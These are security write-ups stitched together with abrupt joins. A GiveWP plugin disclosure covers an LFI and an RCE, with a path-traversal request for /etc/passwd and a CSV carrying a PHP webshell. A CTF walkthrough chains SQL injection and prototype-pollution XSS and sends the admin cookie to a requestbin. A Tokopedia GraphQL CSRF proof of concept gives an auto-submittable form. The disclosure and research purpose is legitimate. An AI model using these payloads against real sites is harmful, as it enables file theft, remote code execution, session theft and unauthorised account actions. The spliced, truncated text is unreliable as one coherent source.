GiveWP is one of the popular wordpress plugins to handle fundraising and donation with 100k+ installation. This plugin has main features like setting up donation forms, viewing details of donations/donors and generating a report. There is also other tools feature like import and export donations data.

In this blog post, we will demonstrate two vulnerability that affected GiveWP plugin. The two vulnerability already reported and fixed. It also already assigned CVE-2022-31475 and CVE-2022-28700 by PatchStack. This vulnerability require atleast GiveWP Manager role to exploit.

Vulnerability : LFI

Technical Analysis

On the first step of this vulnerability research, I try to search for "file_get_contents" function call on the code base. One of the interesting code function that call it is located on Give_Batch_Export class function get_file inside give/includes/admin/tools/export/class-batch-export.php :

    protected function get_file() {

        $file = '';

        if ( @file_exists( $this->file ) ) {

            if ( ! is_writable( $this->file ) ) {
                $this->is_writable = false;
            }

            $file = @file_get_contents( $this->file );

        } else {

            @file_put_contents( $this->file, '' );
            @chmod( $this->file, 0664 );

        }

        return $file;
    }

The function is literally will return content of the $this->file variable that already configured on the __construct function of the class :

    public function __construct( $_step = 1, $filename = null ) {

        $upload_dir     = wp_upload_dir();
        $this->filetype = '.csv';

        if ( null === $filename ) {
            $hash           = uniqid();
            $this->filename = "give-{$hash}-{$this->export_type}{$this->filetype}";
        } else {
            $this->filename = $filename;
        }

        $this->file = trailingslashit( $upload_dir['basedir'] ) . $this->filename;

        if ( ! is_writable( $upload_dir['basedir'] ) ) {
            $this->is_writable = false;
        }

        $this->step = $_step;
        $this->done = false;
    }

When doing a traceback call, this get_file function could be called from the function export in the same class :

    public function export() {

        // Set headers
        $this->headers();

        $file = $this->get_file();

        @unlink( $this->file );

        echo $file;

        /**
         * Fire action after file output.
         *
         * @since 1.8
         */
        do_action( 'give_file_export_complete', $_REQUEST );

        give_die();
    }

After doing some tracing, this Give_Batch_Export class and the export function is actually will be called from function give_process_batch_export_form that is located on give/includes/admin/tools/export/export-actions.php :

function give_process_batch_export_form() {

    if ( ! wp_verify_nonce( $_REQUEST['nonce'], 'give-batch-export' ) ) {
        wp_die(
            esc_html__( 'We\'re unable to recognize your session. Please refresh the screen to try again; otherwise contact your website administrator for assistance.', 'give' ),
            esc_html__( 'Error', 'give' ),
            [
                'response' => 403,
            ]
        );
    }

    require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/export/class-batch-export.php';

    /**
     * Fires before batch export.
     *
     * @since 1.5
     *
     * @param string $class Export class.
     */
    do_action( 'give_batch_export_class_include', $_REQUEST['class'] );

    $filename = $_REQUEST['file_name'];

    $export = new $_REQUEST['class']( 1, $filename );
    $export->export();

}

add_action( 'give_form_batch_export', 'give_process_batch_export_form' );

The give_process_batch_export_form function is a callback function that will be called when user perform give_form_batch_export action.

Looking back to the attached code, notice that the code directly passes the $_REQUEST['file_name'] as the $filename parameter to the $_REQUEST['class'] class invoke that we can supply with Give_Batch_Export string.

The setup of $this->file on the class __construct function also doesn't check or sanitize for potential path traversal :

$this->file = trailingslashit( $upload_dir['basedir'] ) . $this->filename;

With this, malicious users that act as GiveWP Manager could use that to leak sensitive local files on the wordpress server.

One Exploit Detail Missing

To be able to exploit this, we need to find a give-batch-export nonce value, since the give_process_batch_export_form function will check the request nonce.

Searching for generation of give-batch-export nonce string on the code base, we find it inside give_do_ajax_export function :

    } else {

        $args = array_merge(
            $_REQUEST,
            [
                'step'        => $step,
                'class'       => $class,
                'nonce'       => wp_create_nonce( 'give-batch-export' ),
                'give_action' => 'form_batch_export',
                'file_name'   => $export->filename,
            ]
        );

        $json_data = [
            'step' => 'done',
            'url'  => esc_url_raw(add_query_arg( $args, admin_url() )),
        ];

    }

    $export->unset_properties( give_clean( $_REQUEST ), $export );
    echo json_encode( $json_data );
    exit;
}

After analyzing, we could receive the nonce function after we successfully try to export donations data.

Steps to Reproduce PoC

1. Admin Install wordpress site
2. Admin Install GiveWP Wordpress Plugin
3. Admin create User B account on wordpress with GiveWP Manager role
4. User B login to the wordpress site (Delete existing donations entry on GiveWP if exists for sake of testing)
5. User B insert some test donation data on the wordpress
6. User B goes to the Export Donations history feature at : http://<wordpress_site>/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=export&type=export_donations
7. User B clicks the "Generate CSV" button on the export page
8. User B check the Burp HTTP history and find POST request made to endpoint /wp-admin/admin-ajax.php with post body action=give_do_ajax_export and then copy the nonce value from the response
9. User B perform this HTTP request and could view content of /etc/passwd :

GET /wp-admin/?class=Give_Batch_Export&nonce=<value_from_step_8>&give_action=form_batch_export&file_name=../../../../../../../../../etc/passwd HTTP/1.1
Host: <wordpress_site>
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
sec-ch-ua-platform: "Linux"
Referer: http://localhost/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=export&type=export_donations
Cookie: [User B Cookie]

The Patch

The LFI vulnerability already fixed on GiveWP version 2.21.0 . The fix is implemented on give_process_batch_export_form function inside give/includes/admin/tools/export/export-actions.php :

    $filename = basename(sanitize_file_name($_REQUEST['file_name']), '.csv');

The $filename variable is already sanitized and thus cannot be supplied by the path traversal payload.

Vulnerability : RCE

Technical Analysis

On the first step of this vulnerability research, I try to search for "file_put_contents" function call on the code base. Little bit similar to the LFI vulnerability, one of the interesting code function that call it is located on Give_Batch_Export class function stash_step_data inside give/includes/admin/tools/export/class-batch-export.php :

    protected function stash_step_data( $data = '' ) {

        $file  = $this->get_file();
        $file .= $data;
        @file_put_contents( $this->file, $file );

        // If we have no rows after this step, mark it as an empty export.
        $file_rows    = file( $this->file, FILE_SKIP_EMPTY_LINES );
        $default_cols = $this->get_csv_cols();
        $default_cols = empty( $default_cols ) ? 0 : 1;

        $this->is_empty = count( $file_rows ) == $default_cols ? true : false;

    }

Above function will append the supplied $data parameter to the $file that fetched from $this->get_file() function. After doing a traceback call, the stash_step_data is could be called using this code function chaining on the Give_Batch_Export class :

$this->process_step() => $this->print_csv_cols() => $this->stash_step_data( $col_data )

The $col_data is metadata of the donation list that will be converted to CSV rows. Now, we need to find code that could call the Give_Batch_Export class and perform the process_step function. We notice that we could call it using the give_do_ajax_export function inside give/includes/admin/tools/export/export-functions.php. This function is literally the main function to handle the process of batch export of donation via ajax.

function give_do_ajax_export() {

    require_once GIVE_PLUGIN_DIR . 'includes/admin/tools/export/class-batch-export.php';

    parse_str( $_POST['form'], $form );

    $_REQUEST = $form = (array) $form;

    if (
        ! wp_verify_nonce( $_REQUEST['give_ajax_export'], 'give_ajax_export' )
        || ! current_user_can( 'manage_give_settings' )
    ) {
        die( '-2' );
    }

    /**
     * Fires before batch export.
     *
     * @since 1.5
     *
     * @param string $class Export class.
     */
    do_action( 'give_batch_export_class_include', $form['give-export-class'] );

    $step     = absint( $_POST['step'] );
    $class    = sanitize_text_field( $form['give-export-class'] );
    $filename = isset( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : null;

    /* @var Give_Batch_Export $export */
    $export = new $class( $step, $filename );

    if ( ! $export->can_export() ) {
        die( '-1' );
    }

    if ( ! $export->is_writable ) {
        $json_args = [
            'error'   => true,
            'message' => esc_html__( 'Export location or file not writable.', 'give' ),
        ];
        echo json_encode( $json_args );
        exit;
    }

    $export->set_properties( give_clean( $_REQUEST ) );

    $export->pre_fetch();

    $ret = $export->process_step();
-------------------------- CUTTED HERE ----------------------------------

Notice that we could call an arbitrary class and supply the $filename for the called class. The $filename is not properly sanitized even if it's already using the sanitize_text_field function. Looking at the function docs, this function is not proper to handle file names, thus we could supply the full path of a file using path traversal and write content to arbitrary php file extension.

Looking back to the stash_step_data function, we could literally write the exported donation's CSV rows to any arbitrary file.

One Exploit Detail Missing

Donation data could be manually input from the donation form or we could import it from a csv file. But, every data input from manual form will be sanitized using the custom give_clean function :

function give_clean( $var ) {
    if ( is_array( $var ) ) {
        return array_map( 'give_clean', $var );
    }

    return is_scalar( $var ) ? sanitize_text_field( wp_unslash( $var ) ) : $var;
}

With that sanitization, we could not (or hardly) craft our malicious PHP code. However, input data from the import CSV process are not sanitized, thus we could inject malicious PHP code into one of the donation fields. When a malicious user, in this case, GiveWP Manager, tries to import donation CSV data, the imported data will be stored in the arbitrary file that the user specified and it could be set to the .php file.

Example of malicious import file (payload.csv) :

"Donation ID","Donation Number","Donation Total","Currency Code","Currency Symbol","Donation Status","Donation Date","Donation Time","Payment Gateway","Payment Mode","Form ID","Form Title","Level ID","Level Title","Title Prefix","First Name","Last Name","Email Address","Company Name","Address 1","Address 2","City","State","Zip","Country","Donor Comment","User ID","Donor ID","Donor IP Address"
"1337","1","25","USD","$","Complete","June 2, 2022","13:50","manual","test","1337","Donation Form","3","$25","","<?php if(isset($_REQUEST['c'])) system($_REQUEST['c']) ;?>","asededdasd","user@mail.com","","","","","","","","","1","1","127.0.0.1"

Steps to Reproduce PoC

1. Admin Install wordpress site
2. Admin Install GiveWP Wordpress Plugin
3. Admin create User B account on wordpress with "GiveWP Manager" role
4. User B login to the wordpress site (Delete existing donations entry on GiveWP if exists for sake of testing)
5. User B go to http://<wordpress_site>/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations to try import a donation
6. User B chooses the attached payload.csv and uploads it to the field. Uncheck the dry run button, Choose "Enabled" on "Test Mode" and click "Begin Import"
7. In the next page (Column Mapping), User B clicks "Submit"
8. After the import success, User B goes to the Export Donations history feature at : http://<wordpress_site>/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=export&type=export_donations
9. User B turn on BurpSuite and intercept the request
10. User B clicks the "Generate CSV" button on the export page
11. User B check the burp http history and find POST request made to endpoint /wp-admin/admin-ajax.php with post body action=give_do_ajax_export and then sent the request to repeater
12. User B adds file_name=../../../../../../../../../<wordpress base path>/wp-content/uploads/shell.php to the POST body data. (Assume that User B knows the wordpress base path using another vuln or technique) and send the request
13. User B visits the uploaded shell on http://<wordpress_site>/wp-content/uploads/shell.php?c=id and RCE can be confirmed

The Patch

The RCE vulnerability already fixed on GiveWP version 2.21.0 . The fix is implemented on give_do_ajax_export function inside give/includes/admin/tools/export/export-functions.php :

    $filename = isset( $_POST['file_name'] ) ?
        basename(sanitize_file_name( $_POST['file_name'] ), '.csv') :
        null;

The $filename variable is already sanitized and thus cannot be supplied by the path traversal payload.

Disclosure Timeline

• 2022-06-03 : Reported both vulnerabilities through Liquid Web Family of Brands Bug Bounty Program
• 2022-06-16 : Vulnerability fixed on GiveWP version 2.21.0
• 2022-07-12 : Vulnerability published and assigned CVE by PatchStack
• 2022-07-15 : Detailed blog post published

Initial Foothold

When first visit the webpage, we get this view of some sort of maps :

There is something interesting on the source page and on the JS files :

view-source:http://slave2.ctf.arkavidia.id:10021/

<!doctype html>
<html>

<head>
    <title>Arkavidia Atlas</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link href="tailwind.css" rel="stylesheet">
    <link rel="stylesheet" href="https://unpkg.com/leaflet@1.7.1/dist/leaflet.css" integrity="sha512-xodZBNTC5n17Xt2atTPuE1HxjVMSvLVW9ocqUKLsCC5CXdbqCmblAshOMAS6/keqq/sMZMZ19scR4PsZChSR7A==" crossorigin="" />
    <script src="https://unpkg.com/leaflet@1.7.1/dist/leaflet.js" integrity="sha512-XQoYMqMTK8LvdxXYG3nZ448hOEQiglfqkJs1NOQV44cWnUrBc8PkAOcXy20w0vlaXaVUearIOBhiXZ5V3ynxwA==" crossorigin=""></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/leaflet.markercluster/1.4.1/leaflet.markercluster.js" integrity="sha512-MQlyPV+ol2lp4KodaU/Xmrn+txc1TP15pOBF/2Sfre7MRsA/pB4Vy58bEqe9u7a7DczMLtU5wT8n7OblJepKbg==" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="atlas.js" type="text/javascript"></script>
</head>

<body>
    <div id="map" class="w-full h-full absolute" style="z-index: -1"></div>
    <div class="bg-white shadow-lg w-full max-w-md absolute m-4 rounded-sm">
        <div class="p-3">
            <h1 class="text-2xl">Arkavidia Atlas</h1>
        </div>
        <div id="inst" class="p-3 border-t">
            <p>Click on a pin to see the location details</p>
        </div>
        <div id="details" class="hidden border-t">
            <img id="poi-preview" width="100%" class="mb-2" />
            <div class="p-3">
                <h3 class="text-xl" id="poi-title"></h3>
                <p id="poi-desc" class="mt-2 text-gray-500"></p>
                <div class="mt-3">
                    <span class="text-red-500 text-xs cursor-pointer" id="close-btn">&#x2715; &nbsp;Close Details</span>
                </div>
            </div>
        </div>
    </div>
    <form id="reportform" action="report.php" method="post">
        <input type="hidden" name="hash" id="report-url" />
    </form>
</body>

<script type="text/javascript" src="app.js"></script>

</html>

view-source:http://slave2.ctf.arkavidia.id:10021/atlas.js

const isObject = (obj) => typeof obj === "object";

function merge(dest, src) {
  for (let attr in src) {
    if (isObject(src[attr])) {
      if (!dest[attr]) dest[attr] = {};
      merge(dest[attr], src[attr]);
    } else {
      dest[attr] = src[attr];
    }
  }

  return dest;
}

function parseHash(hash) {
  if (!hash) return {};
  let parts = hash.split("&");
  let out = {};
  for (let part in parts) {
    let sect = parts[part].split("=");
    let key = sect[0];
    let val = decodeURIComponent(sect[1]);

    merge(out, { [key]: val });
  }

  return out;
}

function setHashParams(newParams) {
  hashParams = merge(hashParams, newParams);
  let attrStrings = [];
  for (let attr in hashParams) {
    attrStrings.push(attr + "=" + encodeURIComponent(hashParams[attr]));
  }
  window.location.href = "#" + attrStrings.join("&");
}

var hash = window.location.hash.substring(1);
var hashParams = parseHash(hash);

view-source:http://slave2.ctf.arkavidia.id:10021/app.js

var lat = -6.8905652;
var long = 107.6101062;
var zoom = 17;

window.onhashchange = function () {
  let hash = window.location.hash.substring(1);
  hashParams = parseHash(hash);
  let openedId = hashParams.o;
  openDetails(openedId);
};

if (hashParams.c) {
  lat = hashParams["c.lat"];
  long = hashParams["c.lon"];
}

if (hashParams.z) {
  zoom = hashParams.z;
}

var points = {};

function openDetails(id) {
  let point = points[id];
  if (point) {
    $("#details").show();
    $("#inst").hide();
    $("#poi-title").text(point.name);
    if (point.img_uri) {
      $("#poi-preview").attr("src", point.img_uri).show();
    } else {
      $("#poi-preview").hide();
    }

    point.isHtml
      ? $("#poi-desc").html(point.description)
      : $("#poi-desc").text(point.description);
  } else {
    $("#details").hide();
    $("#inst").show();
  }
}

function loadBounds(lngLb, latLb, lngUb, latUb) {
  $.get(
    "poi.php",
    { lng_lb: lngLb, lat_lb: latLb, lng_ub: lngUb, lat_ub: latUb },
    function (data) {
      markers.clearLayers();
      points = {};
      for (let key in data) {
        let point = data[key];

        merge(points, { [point.id]: point });

        if (point.id === hashParams.o) {
          openDetails(point.id);
        }

        let id = point.id;
        L.marker([point.lat, point.lng])
          .on("click", function () {
            if (hashParams.o !== id) {
              setHashParams({ o: id });
            } else {
              setHashParams({ o: "" });
            }
          })
          .addTo(markers);
      }
    }
  );
}

var map = L.map("map", { zoomControl: false, maxZoom: 18 }).setView(
  [lat, long],
  zoom
);
let markers = L.markerClusterGroup();
map.addLayer(markers);

map.on("moveend", function (e) {
  let center = map.getCenter();
  let zoom = map.getZoom();
  let bounds = map.getBounds();
  loadBounds(
    bounds._southWest.lng,
    bounds._southWest.lat,
    bounds._northEast.lng,
    bounds._northEast.lat
  );

  setHashParams({
    "c.lat": center.lat,
    "c.lon": center.lng,
    z: zoom,
  });
});

$("#close-btn").click(function () {
  setHashParams({ o: "" });
});

function reportMap() {
  $("#report-url").val(window.location.hash.substring(1));
  $("#reportform").submit();
}

L.tileLayer("https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png", {
  attribution:
    '&copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors | <a class="cursor-pointer" onclick="reportMap();">Report Map</a>',
}).addTo(map);

let bounds = map.getBounds();
let lngLb = hashParams["b.lng.lb"] || bounds._southWest.lng;
let latLb = hashParams["b.lat.lb"] || bounds._southWest.lat;
let lngUb = hashParams["b.lng.ub"] || bounds._northEast.lng;
let latUb = hashParams["b.lat.ub"] || bounds._northEast.lat;

loadBounds(lngLb, latLb, lngUb, latUb);

From all of the code above, we assume there should be a XSS technique involved on the solve step to get the flag. We get this assumption based on there is exist a form that we can report something to admin and there is exist an unsafe merge function that used on the JS code.

Finding the SQL Injection

On the app.js, there is a background request made to path /poi.php with some parameters. My teammate, Fadli, then found that there is SQLi on the GET param request. This is the example request and response from normal request :

GET /poi.php?lng_lb=107.604957818985&lat_lb=-6.891912527239271&lng_ub=107.61525750160219&lat_ub=-6.889223063179617 HTTP/1.1
Host: slave2.ctf.arkavidia.id:10021
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://slave2.ctf.arkavidia.id:10021/
Cache-Control: max-age=0
        

HTTP/1.1 200 OK
Date: Sun, 28 Feb 2021 11:51:00 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.34
Content-Length: 846
Connection: close
Content-Type: application/json


[
  {
    "id": "1",
    "lat": "-6.890572547912598",
    "lng": "107.6097640991211",
    "name": "Labtek V Benny Subianto",
    "description": "Labtek V adalah gedung tercinta yang digunakan oleh mahasiswa Teknik Informatika dan Sistem dan Teknologi Informasi ITB. Gedung ini memiliki kembaran lainnya, yaitu Labtek VI, VII, dan VIII yang masing-masing memiliki namesake yang berbeda.",
    "img_uri": "https://www.itb.ac.id/files/images/1492062830.jpg",
    "meta": null
  },
  {
    "id": "3",
    "lat": "-6.891597",
    "lng": "107.610387",
    "name": "Lapcin & Lapbas",
    "description": "Di dua lapangan ini biasanya IT Festival Arkavidia dilaksanakan! Lapangan Cinta dan Lapangan Basket merupakan saksi bisu dari kegiatan kemahasiswaan di ITB, baik itu konser maupun agitasi.",
    "img_uri": "https://rinaldimunir.files.wordpress.com/2012/12/271120122982.jpg?w=1280&h=960",
    "meta": {
      "establishment": "open space"
    }
  }
]
        

From the normal request above, we know that the meta value could contain another JSON object, so we try to use JSON_OBJECT of the MySQL to select some JSON object on the meta value.

GET /poi.php?lng_lb=1&lat_lb=1&lng_ub=(select+108)+and+false+union+select+1,2,3,4,5,1,JSON_OBJECT('test',JSON_OBJECT('test2','asd'))+--+-&lat_ub=1 HTTP/1.1
Host: slave2.ctf.arkavidia.id:10021
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://slave2.ctf.arkavidia.id:10021/
        

HTTP/1.1 200 OK
Date: Sun, 28 Feb 2021 12:02:26 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.34
Content-Length: 107
Connection: close
Content-Type: application/json


[
  {
    "id": "1",
    "lat": "2",
    "lng": "3",
    "name": "4",
    "description": "5",
    "img_uri": "1",
    "meta": {
      "test": {
        "test2": "asd"
      }
    }
  }
]
        

This SQLi will be used on building the payload for Prototype Pollution XSS.

Crafting Prototype Pollution

We know there is an unsafe merge function that can be used for Prototype Pollution. For the reference of what is Prototype Pollution ? Can be found here .

First, when the web loads, it will try to build hashParams object by using the value supplied on the location.hash.substring(1). Then the webpage will build some parameter and finally call function loadBounds :

let lngLb = hashParams["b.lng.lb"] || bounds._southWest.lng;
let latLb = hashParams["b.lat.lb"] || bounds._southWest.lat;
let lngUb = hashParams["b.lng.ub"] || bounds._northEast.lng;
let latUb = hashParams["b.lat.ub"] || bounds._northEast.lat;

loadBounds(lngLb, latLb, lngUb, latUb);

On the loadBounds function, there will be a GET request to /poi.php and the response data will be build to points object using unsafe merge function :

function loadBounds(lngLb, latLb, lngUb, latUb) {
  $.get(
    "poi.php",
    { lng_lb: lngLb, lat_lb: latLb, lng_ub: lngUb, lat_ub: latUb },
    function (data) {
      markers.clearLayers();
      points = {};
      for (let key in data) {
        let point = data[key];

        merge(points, { [point.id]: point });

        if (point.id === hashParams.o) {
          openDetails(point.id);
        }

After that, there will be a call to function openDetails using the id received from the response :

function openDetails(id) {
  let point = points[id];
  if (point) {
    $("#details").show();
    $("#inst").hide();
    $("#poi-title").text(point.name);
    if (point.img_uri) {
      $("#poi-preview").attr("src", point.img_uri).show();
    } else {
      $("#poi-preview").hide();
    }

    point.isHtml
      ? $("#poi-desc").html(point.description)
      : $("#poi-desc").text(point.description);
  } else {
    $("#details").hide();
    $("#inst").show();
  }
}

Since we control the value on the points object (using SQLi before), we have an idea to inject XSS payload on the description value. But, there is one requirement, point object must have filled value isHtml on the object. But, like you see on the response, there is no isHtml value. Do you remember previously that we can inject JSON object on the meta response value ? Yes, we will use that to host our Prototype Pollution payload. Since the unsafe merge function works recursively, we could pollute the JS prototype by using this value on the meta response :

{"__proto__": {"isHtml": "true"}}

Above payload will pollute the JS prototype and add .isHtml value to all the object exist.

Combine the Vuln and Get the Flag

By combining the two vuln, we come up with this url payload :

http://slave2.ctf.arkavidia.id:10021/#b.lng.lb=1&b.lat.lb=1&b.lng.ub=(select%20108)%20and%20false%20union%20select%20'bruh',2,3,4,'<script>alert(document.domain);</script>',1,JSON_OBJECT('__proto__',JSON_OBJECT('isHtml','true'))%20--%20-&b.lat.ub=1&o=bruh

Visiting above url, we could get a working XSS :

After verify the working XSS, we then try to change the url payload to perform a request to our requestbin and try to leak the admin cookie (if there is any):

http://slave2.ctf.arkavidia.id:10021/#b.lng.lb=1&b.lat.lb=1&b.lng.ub=(select%20108)%20and%20false%20union%20select%20'bruh',2,3,4,'%3Cimg%20src%3d%22https://<reqbin url>/?a%3d%22%2bdocument.cookie%3E',1,JSON_OBJECT('__proto__',JSON_OBJECT('isHtml','true'))%20--%20-&b.lat.ub=1&o=bruh

Send it by trigger reportMap() function on the console after visiting above url, wait some time, and we receive connection from admin and the flag is located on the User-Agent :

Flag : Arkav7{capek_bikin_soalnya_sumpah}

What is Graph Query Language ?

Proof of Concept

When visiting https://m.tokopedia.com, most of the request is using GraphQL endpoint in https://gql.tokopedia.com.Here is the example request to add product to wishlist :

When looking at the request in burpsuite, i notice something interesting.The request to GraphQL endpoint is not using an authentication key or token in the request header.Usually, GraphQL is more like API style that use authentication key to get data, but Tokopedia seems to implement the request to GraphQL endpoint using session and cookie as authentication.

Indeed, before make an actual request to get the data, it will check the authentication to GraphQL using this request :

I'm thinking if we can somehow perform a CSRF attack to the GraphQL endpoint.Then i try to modify request data in burpsuite.Several change that i made to the request :

1. Remove the Referer
2. Set Origin to null
3. Set content-type to text/plain
4. Append "=" to the end of body request

Appending "=" to the end of the body request is to test if we can make a request of JSON data using post form in html and using enctype text/plain.After modifying the request, test to send the request. (Example image below is request to change profile image)

And it works !

We can then craft a simple html to make a CSRF attack (This POC use sample request of uploading a product to the store) :

<html>
    <body>
    <h1>Site Wide CSRF GraphQL : Add Product to Target User</h1>
    <form action="https://gql.tokopedia.com/" method="POST" enctype="text/plain">
        <input type="hidden" name='[{"operationName":"AddProductMutation","variables":{"input":{"product_brand":{"brand_id":0,"name":""},"product_catalog":{"catalog_id":0},"product_category":{"category_id":891},"product_condition":1,"product_description":"Attacker","product_etalase":{"etalase_id":17561860},"product_free_return":false,"product_min_order":1,"product_must_insurance":false,"product_name":"Added by Attacker","product_picture":[{"from_ig":0,"description":"","x":1,"y":1,"file_path":"product-1/2019/2/6/44628626","file_name":"44628626_6070a039-2f84-4d8c-99b8-c3d68083ebf7_980_759.png"}],"product_preorder":{"preorder_process_time":0,"preorder_status":0,"preorder_time_unit":1},"product_price":100,"product_price_currency":1,"product_sku":"","product_status":1,"product_stock":0,"product_video":[],"product_weight":100,"product_weight_unit":1,"product_wholesale":[]}},"query":"mutation AddProductMutation($input: AddProductInputType) {\n  addProduct(input: $input) {\n    header {\n      messages\n      reason\n      __typename\n    }\n    data {\n      product_id\n      product_name\n      product_alias\n      product_condition\n      product_description\n      product_last_update_price\n      product_min_order\n      product_max_order\n      product_must_insurance\n      product_price\n      product_price_currency\n      product_status\n      product_stock\n      product_weight\n      product_weight_unit\n      product_url\n      product_category {\n        category_id\n        __typename\n      }\n      product_etalase {\n        etalase_id\n        etalase_name\n        __typename\n      }\n      product_position {\n        position\n        __typename\n      }\n      product_shop {\n        shop_id\n        shop_name\n        shop_domain\n        shop_url\n        __typename\n      }\n      product_free_return\n      product_sku\n      product_gtin\n      product_name_editable\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]' />
        <input type="submit" value="Click Me !"/>
    </form>
    </body>
</html>

In above crafted html, is to make a CSRF request to add product to the store (by just modifying the etalase_id to id that the targeted store own).When a targeted user or store account visit webpage that hosting this crafted html and click the submit button (or we can make this auto submit using javascript), the CSRF request will be fired and a product is added to the targeted store without user consent.

Impact

Seeing that request in https://m.tokopedia.com mostly using GraphQL, there is several impact from this security issue :

1. Change user account profile picture
2. Add, edit and delete product from the store
3. Add, edit and delete address from user account
4. Change profile picture, description, status, slogan of the store
5. Add, edit and delete send address of the store
6. Add, edit and delete store note
7. Stealing tokopedia wallet by adding attacker bank account to targeted user account
8. Perform anything about order action behalf of the user
9. etc

That's all from my first blog post, see you again in my next blog post (hopefully).
Happy Bug Hunting !

Timeline